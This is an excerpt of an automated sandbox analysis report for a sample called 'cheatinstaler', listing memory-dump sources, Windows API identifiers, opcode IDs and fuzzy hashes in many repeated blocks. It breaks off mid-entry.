• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 2176759853-0
• Opcode ID: 7a493db6b2aa3cd2f88e086a9d80210bd8f4b3ce53d8088c5f8b34bcaf14f9b4
• Instruction ID: 39f95eb7e23c9fee0884e731427eab497d4bbd583be049d9ca4acbfae75bfdcf
• Opcode Fuzzy Hash: 7a493db6b2aa3cd2f88e086a9d80210bd8f4b3ce53d8088c5f8b34bcaf14f9b4
• Instruction Fuzzy Hash: 80219372A28B8181EA149F66A49017EA364FB89BD0FA84235FB9D07B95CF3CD140C740
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1875163511-0
• Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
• Instruction ID: cd054f0bd998aebd0657d13e766806c2c0aa20cfaa858e2b0e74067abad98b50
• Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
• Instruction Fuzzy Hash: AB317412A09686A1FF25BF16E4A43B9E3A0FB50794FDC4431E64C069A5DF7CEA46C311
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1203560049-0
• Opcode ID: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
• Instruction ID: 41105516fb813c966f1d42bd1b651fb487abcee55ef2487c7a7b9047d6cca7dc
• Opcode Fuzzy Hash: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
• Instruction Fuzzy Hash: AB21B822A1868581FA20AF26F4E52B9B361FF847D4F985230FB9D47695DF2CD540C610
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3118131910-0
                                                                                  • Opcode ID: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                  • Instruction ID: 9f62e82f5359e88db51513e613ee533ad4d05d626480dcce524c0de1aaf9378a
                                                                                  • Opcode Fuzzy Hash: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                  • Instruction Fuzzy Hash: D7218622A18B8181FA10AF26F4A527EB361FB84BD4F941230FB9E46A95DF3CD544C610
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1203560049-0
                                                                                  • Opcode ID: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                  • Instruction ID: 48147dbfb9ae58f3be981875195d10e20a68f900dd1560268d32ebc16bec7d61
                                                                                  • Opcode Fuzzy Hash: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                  • Instruction Fuzzy Hash: 3C217422A1868182EA10AF2AF49417DB3A1FB887A4F980231FB9D47BE5DF3CD540C610
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                  • Instruction ID: 7adb8d4b2a9d8f9dab02593fcc3a4eb5bffe655513934199606cdebc8cc756ca
                                                                                  • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                  • Instruction Fuzzy Hash: 4FE01A24A0430586FA547F3298E9379A352BF88B85F685438D80A02397CE3DE4098620
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75454F895
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75454F89B
                                                                                    • Part of subcall function 00007FF754553EC8: FindClose.KERNELBASE(?,?,00000000,00007FF754560811), ref: 00007FF754553EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 3587649625-0
                                                                                  • Opcode ID: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                  • Instruction ID: 52eccd2752f1448be3cee0fac6ab56f3339ea977018e2e762e97d6a6c325865b
                                                                                  • Opcode Fuzzy Hash: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                  • Instruction Fuzzy Hash: 32919E73F1868194EB10EF2AD4942ADA361FB84798FE84135FA4C0BAA9DF78D545C320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 059fe93b6b6045c61731c70e0e29f52abe1320b84121e6dc329f1e36eead177c
                                                                                  • Instruction ID: 971f407049ca45a9cf09fd5dc4328ed282575d7983062723b68cc76097b3a23f
                                                                                  • Opcode Fuzzy Hash: 059fe93b6b6045c61731c70e0e29f52abe1320b84121e6dc329f1e36eead177c
                                                                                  • Instruction Fuzzy Hash: D141C762F1465285FB00EFB3D4A02AD6760AF44BD4FA81135EF1D2BADADE38D442C310
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF75455274D), ref: 00007FF7545528A9
                                                                                  • GetLastError.KERNEL32(?,00007FF75455274D), ref: 00007FF7545528B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                  • Instruction ID: 8481f520b260555702482f80d10d9926c21c45b5c2a2d09b820103174c18ff15
                                                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                  • Instruction Fuzzy Hash: 6431B422B19A5282EA686F6BD9D06B9A350EF04BD4FDC0131FE1D07790DE3CE5418B60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1746051919-0
                                                                                  • Opcode ID: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                  • Instruction ID: 3943aefc4c66bf5bf5f5bb85e5cefab880cf8c035414d64f2345429b9cd675da
                                                                                  • Opcode Fuzzy Hash: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                  • Instruction Fuzzy Hash: FC319222A1874541EA14AF16E4A537EB360FB847D0FE84231EB9D0BB95DF3CE140C714
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                  • Instruction ID: 24958b425aff6157d5aa06331a85b91b7a1c98f62566a7e99eda91a1d0e6f1c4
                                                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                  • Instruction Fuzzy Hash: 8921B522F0974251EA6AAF53D4A47F6A790AF017A4FD94031FE4C06295EE3CE446CB20
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                  • String ID:
                                                                                  • API String ID: 3548387204-0
                                                                                  • Opcode ID: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                                                                                  • Instruction ID: c0dc60d9fb3379260865381c6fc32216505403b29e1a905f4511f977f278c43c
                                                                                  • Opcode Fuzzy Hash: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                                                                                  • Instruction Fuzzy Hash: A911ED60E5C14311FA5ABFB354FA2B9C1922F913D0FDC0034FA1D8A2C3ED1CAA468672
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString
APIs
Similarity
• API ID: ErrorFileLastPointer
APIs
Similarity
• API ID: Item$RectText$ClientWindowswprintf
APIs
• GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75455EBAD,?,?,?,?,00007FF754555752,?,?,?,00007FF7545556DE), ref: 00007FF75455EB5C
• GetProcessAffinityMask.KERNEL32 ref: 00007FF75455EB6F
Similarity
• API ID: Process$AffinityCurrentMask
APIs
Similarity
• API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
APIs
Similarity
• API ID: ErrorLanguagesLastPreferredRestoreThread
APIs
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
APIs
Similarity
• API ID: CompareString_invalid_parameter_noinfo_noreturn
APIs
  • Part of subcall function 00007FF75455E948: ReleaseSemaphore.KERNEL32 ref: 00007FF75455E974
  • Part of subcall function 00007FF75455E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF75455E993
  • Part of subcall function 00007FF75455E948: DeleteCriticalSection.KERNEL32 ref: 00007FF75455E9AA
  • Part of subcall function 00007FF75455E948: CloseHandle.KERNEL32 ref: 00007FF75455E9B7
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF754561ACB
Similarity
• API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
APIs
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
APIs
  • Part of subcall function 00007FF754553EC8: FindClose.KERNELBASE(?,?,00000000,00007FF754560811), ref: 00007FF754553EFD
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75454E993
Similarity
• API ID: CloseFind_invalid_parameter_noinfo_noreturn
APIs
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 2a7259d764eb0786ebfe04c0f82892bddeea34df329c5f9a795040d30637ea4b
                                                                                  • Instruction ID: 98447c0c851af6d7c0f3ca46042f5482b21efd3bc997a30ec0887353c303c03e
                                                                                  • Opcode Fuzzy Hash: 2a7259d764eb0786ebfe04c0f82892bddeea34df329c5f9a795040d30637ea4b
                                                                                  • Instruction Fuzzy Hash: 0041D462F18A8142EA14AF17AA943B9E651FB84FC0F888535FE5D4BF5ADF3CD5918300
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 83ad35d64ea7fd9ec499ef84e65e7ac41e5a751faf938eb3350802b96480f739
• Instruction ID: 13486cc2c372c021efac24c7f3e45ce64d1524f5e18fa5779da1cbc96f6312a8
• Opcode Fuzzy Hash: 83ad35d64ea7fd9ec499ef84e65e7ac41e5a751faf938eb3350802b96480f739
• Instruction Fuzzy Hash: 7D41D462A0870581EA14AF26F5E53B9A3A1EB44BD4F981134FB4D076A9DF3DE440C720
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
• Instruction ID: 386f74cc9ebd033cd1b4f6ca358998e0fa1baa8279c34b13e279a4052302d4cd
• Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
• Instruction Fuzzy Hash: A0417122E1865282FA24BF1798F8178A261FF54B88FDC4436DA0D5B692DF3DE941C760
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 680105476-0
• Opcode ID: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
• Instruction ID: 4bc30e7c70f3327cd49fa9d23d90d897b2bae03c9c3b9c368a12df39a1a9b8ea
• Opcode Fuzzy Hash: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
• Instruction Fuzzy Hash: C2218E22E0865185EA14AF93A494279A250FB04BF0FAC0B31DFBE4BBD1DE7CE5518354
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 666f133610fea259bd544e2999fb6daaa2acf36aefc263c061b62d30eb464117
• Instruction ID: d515ce8cccf1a74cb0d0cec850459007f73e0825c4a64f2fd9097440635238eb
• Opcode Fuzzy Hash: 666f133610fea259bd544e2999fb6daaa2acf36aefc263c061b62d30eb464117
• Instruction Fuzzy Hash: AE21F822B1558662EA0CAF62D5A83F9A315FB447C4FE84431E71D0B6A2DF38A5A5C321
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
• Instruction ID: 3223e94a6378de05e612ccf3b9065f0b1231a4bba4b50b5e89da946a0e6b3983
